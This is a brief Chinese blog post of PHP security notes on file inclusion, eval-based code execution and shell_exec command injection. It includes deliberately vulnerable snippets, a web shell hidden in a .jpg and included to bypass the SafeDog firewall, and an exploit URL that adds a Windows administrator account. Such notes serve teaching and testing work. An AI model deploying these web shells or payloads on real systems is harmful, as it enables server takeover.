标签:
Php包含漏洞 易裤cms包含漏洞
<? $i = $_GET[‘t‘]; include($i); //http://127.0.0.1/include/include.php?t=test.txt //$i=test.txt
?>
结论:文件包含意味着以php脚本格式去执行包含的文件
远程包含,本地包含原因:
1.php.ini中allow_url_include设置开启则可存在远程包含
2.Php编程中包含函数的选用.
低版本安全狗后门绕过采用的文件包含漏洞
上传两个文件
1.logo.jpg 代码 <?php eval($_POST[‘pass’]);?>
2.Xx.php 代码 <?php include(“logo.jpg”)?>
代码执行漏洞
thinkphp代码执行漏洞
跟菜刀原理差不多
eval assert相关函数
<?php
$id = $_GET[‘x‘];
eval("$id");
?>
http://192.168.0.111/phpexp/eval.php?x=exec("net localgroup administrators test /add");
命令执行
exec,shell_exec,system等函数引起的漏洞
程序员在开发cms网站时,函数后存在可控变量,会导致命令执行漏洞
<?php $cmd = $_GET[‘x‘]; echo shell_exec($cmd); ?>
标签:
原文地址:http://www.cnblogs.com/test404/p/5636204.html